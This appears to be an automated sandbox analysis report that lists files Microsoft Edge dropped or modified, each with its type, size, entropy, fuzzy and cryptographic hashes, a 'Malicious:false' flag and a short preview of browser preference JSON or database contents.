                                                                                                                                                                                                                                                                                  MD5:3AEAF8190375C177C19CC8B3CCAB03A2
                                                                                                                                                                                                                                                                                  SHA1:777966B9FC85E0AB9CF49459DA11EC5E854389EC
                                                                                                                                                                                                                                                                                  SHA-256:0B43C138FB825C5D829AE47F88ED46B1BA188277E8E9DAB01BAB8B53EAC8896E
                                                                                                                                                                                                                                                                                  SHA-512:231B4D38711880A379A5EB53FEB3723F5682FB843521E603901FC8BE929C861DDDE77CE8B06B764093F8CDD124E1E343072F13B3F398F3D91C532FB5963F3C9F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:sdPC......................5.y&.K.?...."DmHYrCHlc5lFyRGUq62R3qS1k3Ui6rBGmzkDnx9Vsbw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (18188), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):18189
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.448614101832842
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JhCa2kCPVtCYhYojREy6VrhU4bIj8/pj+FnYQwpCkEx:sV6LAJu43JAa/CdtBay65lpUYQwEk0
                                                                                                                                                                                                                                                                                  MD5:65397137AFB999EE08C76EFF91F99EED
                                                                                                                                                                                                                                                                                  SHA1:038946E0ACA6757624189B525B00B788C1F21F8A
                                                                                                                                                                                                                                                                                  SHA-256:14B83CBA20292EFF75ECC6327DFF3713CD38B327360906FD9A6A99871AC761CC
                                                                                                                                                                                                                                                                                  SHA-512:8EF1C47A5B2B9A6AF89299A44BFB9A19D5E0EC08090BD5A1D2D587E9A880C227565C6AFA2F03A0BDFCB44E41868240CE6040A03D00F5CD96A8C1F50A27456BDB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14307
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.202386489124765
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JZCm4keYhYojREDj8/pj+FnYQwpvUj1f:sV6LAJu43J4mBdaopUYQw1k
                                                                                                                                                                                                                                                                                  MD5:9256AFBD2DEA8E81D7023E722D3B0AA2
                                                                                                                                                                                                                                                                                  SHA1:C026DB0F267F58CA724AECFBA62D129DB31687F7
                                                                                                                                                                                                                                                                                  SHA-256:923297D81BF2960D2BADFF3DFA2A3D1DE88557F386C21C8D28E92FFEF6CBE4AB
                                                                                                                                                                                                                                                                                  SHA-512:24BEE28D4E3E17752F45F852A1F53130979C18065E3F6B255D4B1A974AAD6BB0158A648995055D9450AB4EF30D973871CC05E7D7F097644B10E0EF54EB98F81E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (18260), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):18261
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.447220593344075
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JhCa2kCPVtCYhYojREy6VrhU4bIj8/pj+FnYQwpCGEx:sV6LAJu43JAa/CdtBay65lpUYQwEG0
                                                                                                                                                                                                                                                                                  MD5:4BA4406CEBDE64C71130E8A1CB0427D1
                                                                                                                                                                                                                                                                                  SHA1:DF0E519D9BDE744E740D2BCCF31EFECA5C82C265
                                                                                                                                                                                                                                                                                  SHA-256:915CB995B5BF0DDCEB4AD0003C686D0F40C0CC069CDDD98E2AB4FC8A692CED29
                                                                                                                                                                                                                                                                                  SHA-512:79CD6D684A98306D5B239469D96F3EEBCB6E0EFA447AFB751C1D11507B9EBA82ADEADE3064E4B5FE30B0F59F18B102796F7542F7F9954740C2DCD2974DAC0BE1
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):39659
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.562103003771585
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:ppN3CR7pLGLh6kWPg6fTk8F1+UoAYDCx9Tuqh0VfUC9xbog/OVOud2WFBrwoV4Ys:ppN3CHch6kWPg6fTku1jaXudTFyoVh4H
                                                                                                                                                                                                                                                                                  MD5:ED82F7B9299318EE58A76643ECE06DC1
                                                                                                                                                                                                                                                                                  SHA1:32FB8605F536559C603BF07723923D25662BA3E2
                                                                                                                                                                                                                                                                                  SHA-256:7291719A714B7AE64735B470EF2472317BE8C15BFC5E0C9821EA17EB9EBD73FD
                                                                                                                                                                                                                                                                                  SHA-512:454D76E068ED082E93937064BA79A02FDEBB07579D022079A2D54147DF5EAE9243C0EDB7CE30A9767B63B67E7F961AF5531C539028403E2AA25ACC862C0C058B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380417155993821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380417155993821","location":5,"ma
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):37816
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5558262999486345
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:ppN3CR7pLGLh6kWPg6fTk8F1+UoAYDCx9Tuqh0VfUC9xbog/OVV2WFBrwoVQYDdn:ppN3CHch6kWPg6fTku1jaYTFyoVp4tM
                                                                                                                                                                                                                                                                                  MD5:A8FAAD571000A65A63A9B1ECA77DF33F
                                                                                                                                                                                                                                                                                  SHA1:BF7D384B9BE4050EAE141171C00450EEEAE70412
                                                                                                                                                                                                                                                                                  SHA-256:C83DBEFFB2438B5845A1D93D0C1B2868B9CD87E83AB19B8F1102AC8B50FCB391
                                                                                                                                                                                                                                                                                  SHA-512:E7DCAEFE9AED4DE437B6D5A75721605753575C8A28D0052ED51D2080136FAD7B0E846DC12E034E54F26D12C72BE6AB93AA7624E99F727C8A7C141BF0ABFF2B55
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380417155993821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380417155993821","location":5,"ma
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):548540
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.186867821530816
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12288:s721JH7SgyIhkNEqeyZ/CSCqEzz5SaOPAI:sWt7SgyfNEq1Z/jvQzEaBI
                                                                                                                                                                                                                                                                                  MD5:EBB5A0BDEE165E5E565C506AD68CBA9E
                                                                                                                                                                                                                                                                                  SHA1:F5B42E0014D4BDD0DD208B359ECF908D8723D28C
                                                                                                                                                                                                                                                                                  SHA-256:5561CC7B479127FD01BD511F4A455016313DAA0664A4CCBC7B084CE84601906C
                                                                                                                                                                                                                                                                                  SHA-512:BB2DCF9E7B19A951ED0563A1A776EF3A955ADD58AAD6CE090620D3D2EAC1E2A7B7EC3876863894527DFDE52BD02E487D7508751D9146218DD6E670244D97605C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.^..'.]ASSET:arbitration_priority_list......`{.. "configVersion": 32,..`PrivilegedExperiences": [.., "ShorelineN)..ID".F.(.HOPPING_AUTO_SHOW_COUPONS_CHECKOUT"j,.<LOWER_PRICE_FOUNrY..B.h.SEARCHn...REBATES.#.0_CONFIRMATION.0.$DEACTIVATEr.......W..ORGANICn+.)#.HISTORYn)..|.T._NEW./....0SERVER_DRIVEN.2.PPERSONALIZED_CASHBACKn..R1.... URL_PARAM1.nk..-)\.COMPARISv..>6.....EXPRES...6c..AL...Gv..63....._PAGEn..6;..HOME.3..REWARDrg....LI.)n..Q.me.ION_FAIL.m.8SWITCHED_TO_MSAnh..NOTIFIC...,OTHER_SELLERnP..ITEM_ADD.} CART_FROM.@..PROFESSIa+._REVIEWrT..VIRTUAL.jr...1.CAMPAIGr..8PACKAGE_TRACKINJ..$OPEN_FLYOU...EDGE..r..,GUEST_DOMAINQ.nK.HSUSTAINABILITY_LANDR...o:2..PURCHASr..M..h.E.h..AT...LE....GIFT...(PRINT_GROCEv...#E.....CONTRO~..!|,S_MARKETPLACrl..!..RUNNv'..ABANDON.&.Rr2..P.....A..OF_STOv}.b3.....PB..0.,AWARENESSEXPJ...A...SENv...AaT.'./...2!..SCRIPrc.0MOMENT_IN_TIMr........_MICRO.l..TREe..HJ.."b. RECOMMEND...S.j..PRODUCT..?.$SURFACE_UP..n..Bi....!Kn..B5..EXPa..C.n.ON+.!.B6..IM.6..*..CODE
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):1695826
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.041139293128906
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24576:HPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:HPfZ/mS5
                                                                                                                                                                                                                                                                                  MD5:5ADFC692C51D4DF12A86285A6DCD2601
                                                                                                                                                                                                                                                                                  SHA1:EB817234AE36F77B1A382C8082536C0966908EFF
                                                                                                                                                                                                                                                                                  SHA-256:8267B578BD88C526446D6906855E979E1B03F3B4ADB47DFBE8A0210216B20274
                                                                                                                                                                                                                                                                                  SHA-512:5A0556EDEFC6EDE646117C3B498265BE10E53F139DFC27C9DF040AEE2B063D4A355B2626917693940055DA92C8E6D876C39B267D07428BB75F711D33F9B96CF3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.16..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13380417161543977.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}]..#M.................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13380417161584668.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):357
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.147748076564075
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVC/M54q2Pwkn23oH+Tcwt9Eh1tIFUtfCGLJZmw5CEMALf0PhCAMMnALfm8FlWR:7V/avYfYeb9Eh16FUtfD9/5dMB5DMMwC
                                                                                                                                                                                                                                                                                  MD5:D0BF9247DDEEECE7A1D1CEACC5574B2B
                                                                                                                                                                                                                                                                                  SHA1:D1450009E9E57F887F0908232E193330F4C0147C
                                                                                                                                                                                                                                                                                  SHA-256:7B5810B4C5CCBB2B016CFBE8AA438805EE2FA1EF180D3A55CD02101C1B763DEC
                                                                                                                                                                                                                                                                                  SHA-512:57D00F1E17013F35A47AF73FE71C7585ACBBCB4879B1385BDF0F5899C790EAED7294DD73F3603A56A569D507FAA3AC5562C12BCC79D1645910D675F725336A9D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.567 1f84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/03-17:33:01.576 1f84 Recovering log #3.2025/01/03-17:33:01.605 1f84 Level-0 table #3: started.2025/01/03-17:33:02.038 1f84 Level-0 table #3: 548540 bytes OK.2025/01/03-17:33:02.047 1f84 Delete type=0 #3.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):357
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.147748076564075
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVC/M54q2Pwkn23oH+Tcwt9Eh1tIFUtfCGLJZmw5CEMALf0PhCAMMnALfm8FlWR:7V/avYfYeb9Eh16FUtfD9/5dMB5DMMwC
                                                                                                                                                                                                                                                                                  MD5:D0BF9247DDEEECE7A1D1CEACC5574B2B
                                                                                                                                                                                                                                                                                  SHA1:D1450009E9E57F887F0908232E193330F4C0147C
                                                                                                                                                                                                                                                                                  SHA-256:7B5810B4C5CCBB2B016CFBE8AA438805EE2FA1EF180D3A55CD02101C1B763DEC
                                                                                                                                                                                                                                                                                  SHA-512:57D00F1E17013F35A47AF73FE71C7585ACBBCB4879B1385BDF0F5899C790EAED7294DD73F3603A56A569D507FAA3AC5562C12BCC79D1645910D675F725336A9D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:01.567 1f84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/03-17:33:01.576 1f84 Recovering log #3.2025/01/03-17:33:01.605 1f84 Level-0 table #3: started.2025/01/03-17:33:02.038 1f84 Level-0 table #3: 548540 bytes OK.2025/01/03-17:33:02.047 1f84 Delete type=0 #3.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):157
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4660362530563615
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjJhuZx+Yw2RsXM/QoLcRc6JBrXll9SJgWvNQH6bELCzR6CGPkhv:scoBY7jJhaxDRsXtocRXlMgMSKEO96C3
